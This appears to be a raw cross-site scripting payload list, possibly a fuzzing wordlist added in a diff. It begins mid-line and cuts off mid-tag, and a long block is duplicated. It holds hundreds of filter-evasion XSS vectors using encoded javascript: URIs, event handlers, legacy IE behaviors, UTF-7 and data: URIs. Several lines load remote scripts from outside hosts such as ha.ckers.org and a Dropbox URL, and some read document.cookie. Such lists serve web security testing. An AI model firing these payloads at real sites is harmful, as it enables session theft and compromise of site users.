to=`&lt;img/src=&quot;x&quot;onerror=javascript:alert(1)&gt;`> +1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=javascript:alert(1)&gt;> +<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=%(vml)s#xss></vmlframe> +1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a> +<a style="behavior:url(#default#AnchorClick);" folder="javascript:javascript:alert(1)">XXX</a> +<x style="behavior:url(%(sct)s)"> +<xml id="xss" src="%(htc)s"></xml> <label dataformatas="html" datasrc="#xss" datafld="payload"></label> +<event-source src="%(event)s" onload="javascript:alert(1)"> +<a href="javascript:javascript:alert(1)"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A"> +<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=javascript:alert(1)&gt;"> +<script>%(payload)s</script> +<script src=%(jscript)s></script> +<script language='javascript' src='%(jscript)s'></script> +<script>javascript:alert(1)</script> +<IMG SRC="javascript:javascript:alert(1);"> +<IMG SRC=javascript:javascript:alert(1)> +<IMG SRC=`javascript:javascript:alert(1)`> +<SCRIPT SRC=%(jscript)s?<B> +<FRAMESET><FRAME SRC="javascript:javascript:alert(1);"></FRAMESET> +<BODY ONLOAD=javascript:alert(1)> +<BODY ONLOAD=javascript:javascript:alert(1)> +<IMG SRC="jav ascript:javascript:alert(1);"> +<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=javascript:alert(1)> +<SCRIPT/SRC="%(jscript)s"></SCRIPT> +<<SCRIPT>%(payload)s//<</SCRIPT> +<IMG SRC="javascript:javascript:alert(1)" +<iframe src=%(scriptlet)s < +<INPUT TYPE="IMAGE" SRC="javascript:javascript:alert(1);"> +<IMG DYNSRC="javascript:javascript:alert(1)"> +<IMG LOWSRC="javascript:javascript:alert(1)"> +<BGSOUND SRC="javascript:javascript:alert(1);"> +<BR SIZE="&{javascript:alert(1)}"> +<LAYER SRC="%(scriptlet)s"></LAYER> +<LINK REL="stylesheet" HREF="javascript:javascript:alert(1);"> +<STYLE>@import'%(css)s';</STYLE> +<META HTTP-EQUIV="Link" Content="<%(css)s>; REL=stylesheet"> +<XSS STYLE="behavior: url(%(htc)s);"> +<STYLE>li {list-style-image: url("javascript:javascript:alert(1)");}</STYLE><UL><LI>XSS +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:javascript:alert(1);"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:javascript:alert(1);"> +<IFRAME SRC="javascript:javascript:alert(1);"></IFRAME> +<TABLE BACKGROUND="javascript:javascript:alert(1)"> +<TABLE><TD BACKGROUND="javascript:javascript:alert(1)"> +<DIV STYLE="background-image: url(javascript:javascript:alert(1))"> +<DIV STYLE="width:expression(javascript:alert(1));"> +<IMG STYLE="xss:expr/*XSS*/ession(javascript:alert(1))"> +<XSS STYLE="xss:expression(javascript:alert(1))"> +<STYLE TYPE="text/javascript">javascript:alert(1);</STYLE> +<STYLE>.XSS{background-image:url("javascript:javascript:alert(1)");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:javascript:alert(1)")}</STYLE> +<!--[if gte IE 4]><SCRIPT>javascript:alert(1);</SCRIPT><![endif]--> +<BASE HREF="javascript:javascript:alert(1);//"> +<OBJECT TYPE="text/x-scriptlet" DATA="%(scriptlet)s"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT> +<HTML xmlns:xss><?import namespace="xss" implementation="%(htc)s"><xss:xss>XSS</xss:xss></HTML>""","XML namespace."),("""<XML ID="xss"><I><B>&lt;IMG SRC="javas<!-- -->cript:javascript:alert(1)"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> +<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;javascript:alert(1)&lt;/SCRIPT&gt;"></BODY></HTML> +<SCRIPT SRC="%(jpg)s"></SCRIPT> +<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4- +<form id="test" /><button form="test" formaction="javascript:javascript:alert(1)">X +<body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus> +<P STYLE="behavior:url('#default#time2')" end="0" onEnd="javascript:alert(1)"> +<STYLE>@import'%(css)s';</STYLE> +<STYLE>a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}</STYLE> +<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>javascript:alert(1)&&;&&<&&/script&&> +<SCRIPT onreadystatechange=javascript:javascript:alert(1);></SCRIPT> +<style onreadystatechange=javascript:javascript:alert(1);></style> +<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>javascript:alert(1);</html:script></html:html> +<embed code=%(scriptlet)s></embed> +<embed code=javascript:javascript:alert(1);></embed> +<embed src=%(jscript)s></embed> +<frameset onload=javascript:javascript:alert(1)></frameset> +<object onerror=javascript:javascript:alert(1)> +<embed type="image" src=%(scriptlet)s></embed> +<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]<![CDATA[cript:javascript:alert(1);">]]</C><X></xml> +<IMG SRC=&{javascript:alert(1);};> +<a href="jav&#65ascript:javascript:alert(1)">test1</a> +<a href="jav&#97ascript:javascript:alert(1)">test1</a> +<embed width=500 height=500 code="data:text/html,<script>%(payload)s</script>"></embed> +<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=javascript:alert(1)&amp;gt;>"> +';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; +alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- +></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +'';!--"<XSS>=&{()} +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +<IMG SRC=JaVaScRiPt:alert('XSS')> +<IMG SRC=javascript:alert("XSS")> +<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> +<a onmouseover="alert(document.cookie)">xxs link</a> +<a onmouseover=alert(document.cookie)>xxs link</a> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> +<IMG SRC=# onmouseover="alert('xxs')"> +<IMG SRC= onmouseover="alert('xxs')"> +<IMG onmouseover="alert('xxs')"> +<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> +<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC="jav ascript:alert('XSS');"> +<IMG SRC="jav&#x09;ascript:alert('XSS');"> +<IMG SRC="jav&#x0A;ascript:alert('XSS');"> +<IMG SRC="jav&#x0D;ascript:alert('XSS');"> +perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out +<IMG SRC=" &#14; javascript:alert('XSS');"> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> +<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > +<SCRIPT SRC=//ha.ckers.org/.j> +<IMG SRC="javascript:alert('XSS')" +<iframe src=http://ha.ckers.org/scriptlet.html < +\";alert('XSS');// +</TITLE><SCRIPT>alert("XSS");</SCRIPT> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<BODY BACKGROUND="javascript:alert('XSS')"> +<IMG DYNSRC="javascript:alert('XSS')"> +<IMG LOWSRC="javascript:alert('XSS')"> +<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> +<IMG SRC='vbscript:msgbox("XSS")'> +<IMG SRC="livescript:[code]"> +<BODY ONLOAD=alert('XSS')> +<BGSOUND SRC="javascript:alert('XSS');"> +<BR SIZE="&{alert('XSS')}"> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +exp/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'> +<STYLE TYPE="text/javascript">alert('XSS');</STYLE> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<XSS STYLE="xss:expression(alert('XSS'))"> +<XSS STYLE="behavior: url(xss.htc);"> +¼script¾alert(¢XSS¢)¼/script¾ +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<TABLE BACKGROUND="javascript:alert('XSS')"> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"> +<DIV STYLE="background-image: url(javascript:alert('XSS'))"> +<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> +<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> +<DIV STYLE="width: expression(alert('XSS'));"> +<BASE HREF="javascript:alert('XSS');//"> + <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> +<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> +Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser +<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> + <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- +<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<A HREF="http://66.102.7.147/">XSS</A> +<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> +<A HREF="http://1113982867/">XSS</A> +<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> +<A HREF="http://0102.0146.0007.00000223/">XSS</A> +<A HREF="htt p://6 6.000146.0x7.147/">XSS</A> +<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00> +<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<sVg><scRipt %00>alert&lpar;1&rpar; {Opera} +<img/src=`%00` onerror=this.onerror=confirm(1) +<form><isindex formaction="javascript&colon;confirm(1)" +<img src=`%00`&NewLine; onerror=alert(1)&NewLine; +<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> +<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? +<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> +<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ +&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00 +<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script +<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert&#x28;1&#x29;">X +</script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> +<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> +<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> +<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a +http://www.google<script .com>alert(document.location)</script +<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a +<img/src=@&#32;&#13; onerror = prompt('&#49;') +<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; +<script ^__^>alert(String.fromCharCode(49))</script ^__^ +</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( +&#00;</form><input type&#61;"date" onfocus="alert(1)"> +<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> +<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ +<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> +<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> +<script ~~~>alert(0%0)</script ~~~> +<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> +<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN +<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) +&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' +&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} +<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ +<div/style="width:expression(confirm(1))">X</div> {IE7} +<iframe/%00/ src=javaSCRIPT&colon;alert(1) +//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// +/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> +//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ +</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> +<a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> +</plaintext\></|\><plaintext/onmouseover=prompt(1) +</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<var onmouseover="prompt(1)">On Mouse Over</var> +<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> +http://www.<script>alert(1)</script .com +<iframe src=j&NewLine;&Tab;a&NewLine;&Tab;&Tab;v&NewLine;&Tab;&Tab;&Tab;a&NewLine;&Tab;&Tab;&Tab;&Tab;s&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;c&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;i&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;p&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&colon;a&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;l&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;e&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;r&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;t&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;28&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;1&NewLine;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;&Tab;%29></iframe> +<svg><script ?>alert(1) +<iframe src=j&Tab;a&Tab;v&Tab;a&Tab;s&Tab;c&Tab;r&Tab;i&Tab;p&Tab;t&Tab;:a&Tab;l&Tab;e&Tab;r&Tab;t&Tab;%28&Tab;1&Tab;%29></iframe> +<img src=`xx:xx`onerror=alert(1)> +<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> +<meta http-equiv="refresh" content="0;javascript&colon;alert(1)"/> +<math><a xlink:href="//jsfiddle.net/t846h/">click +<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> +<svg contentScriptType=text/vbs><script>MsgBox+1 +<a href="data:text/html;base64_,<svg/onload=\u0061&#x6C;&#101%72t(1)>">X</a +<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> +<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ +<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F +<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script +<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)> +<script>+-+-1-+-+alert(1)</script> +<body/onload=&lt;!--&gt;&#10alert(1)> +<script itworksinallbrowsers>/*<script* */alert(1)</script +<img src ?itworksonchrome?\/onerror = alert(1) +<svg><script>//&NewLine;confirm(1);</script </svg> +<svg><script onlypossibleinopera:-)> alert(1) +<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(1)>ClickMe +<script x> alert(1) </script 1=2 +<div/onmouseover='alert(1)'> style="x:"> +<--`<img/src=` onerror=alert(1)> --!> +<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(1)></script> +<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> +"><img src=x onerror=window.open('https://www.google.com/');> +<form><button formaction=javascript&colon;alert(1)>CLICKME +<math><a xlink:href="//jsfiddle.net/t846h/">click +<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> +<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> +<a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a> +‘; alert(1); +‘)alert(1);// +<ScRiPt>alert(1)</sCriPt> +<IMG SRC=jAVasCrIPt:alert(‘XSS’)> +<IMG SRC=”javascript:alert(‘XSS’);”> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +<IMG SRC=javascript:alert(‘XSS’)> +<img src=xss onerror=alert(1)> +<iframe %00 src="&Tab;javascript:prompt(1)&Tab;"%00> +<svg><style>{font-family&colon;'<iframe/onload=confirm(1)>' +<input/onmouseover="javaSCRIPT&colon;confirm&lpar;1&rpar;" +<sVg><scRipt %00>alert&lpar;1&rpar; {Opera} +<img/src=`%00` onerror=this.onerror=confirm(1) +<form><isindex formaction="javascript&colon;confirm(1)" +<img src=`%00`&NewLine; onerror=alert(1)&NewLine; +<script/&Tab; src='https://dl.dropbox.com/u/13018058/js.js' /&Tab;></script> +<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? +<iframe/src="data:text/html;&Tab;base64&Tab;,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> +<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/ +&#34;&#62;<h1/onmouseover='\u0061lert(1)'>%00 +<iframe/src="data:text/html,<svg &#111;&#110;load=alert(1)>"> +<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(1)" http-equiv="refresh"/> +<svg><script xlink:href=data&colon;,window.open('https://www.google.com/')></script +<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} +<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> +<iframe src=javascript&colon;alert&lpar;document&period;location&rpar;> +<form><a href="javascript:\u0061lert&#x28;1&#x29;">X +</script><img/*%00/src="worksinchrome&colon;prompt&#x28;1&#x29;"/%00*/onerror='eval(src)'> +<img/&#09;&#10;&#11; src=`~` onerror=prompt(1)> +<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(1)"&#11;&#10;&#09;;> +<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="&#09;&#10;&#11;>X</a +http://www.google<script .com>alert(document.location)</script +<a&#32;href&#61;&#91;&#00;&#93;"&#00; onmouseover=prompt&#40;1&#41;&#47;&#47;">XYZ</a +<img/src=@&#32;&#13; onerror = prompt('&#49;') +<style/onload=prompt&#40;'&#88;&#83;&#83;'&#41; +<script ^__^>alert(String.fromCharCode(49))</script ^__^ +</style &#32;><script &#32; :-(>/**/alert(document.location)/**/</script &#32; :-( +&#00;</form><input type&#61;"date" onfocus="alert(1)"> +<form><textarea &#13; onkeyup='\u0061\u006C\u0065\u0072\u0074&#x28;1&#x29;'> +<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ +<iframe srcdoc='&lt;body onload=prompt&lpar;1&rpar;&gt;'> +<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(1)&NewLine;>X</a> +<script ~~~>alert(0%0)</script ~~~> +<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;1&rpar;> +<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN +<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) +&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(1)>' +&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} +<marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ +<div/style="width:expression(confirm(1))">X</div> {IE7} +<iframe/%00/ src=javaSCRIPT&colon;alert(1) +//<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;><input/type='submit'>// +/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> +//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ +</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/</style> +<a/href="javascript:&#13; javascript:prompt(1)"><input type="X"> +</plaintext\></|\><plaintext/onmouseover=prompt(1) +</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert&#x28;1&#x29; {Opera} +<a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button> +<div onmouseover='alert&lpar;1&rpar;'>DIV</div> +<iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> +<a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> +<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> +<var onmouseover="prompt(1)">On Mouse Over</var> +<a href=javascript&colon;alert&lpar;document&period;cookie&rpar;>Click Here</a> +<img src="/" =_=" title="onerror='prompt(1)'"> +<%<!--'%><script>alert(1);</script --> +<script src="data:text/javascript,alert(1)"></script> +<iframe/src \/\/onload = prompt(1) +<iframe/onreadystatechange=alert(1) +<svg/onload=alert(1) +<input value=<><iframe/src=javascript:confirm(1) +<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> +http://www.<script>alert(1)</script .com +<iframe 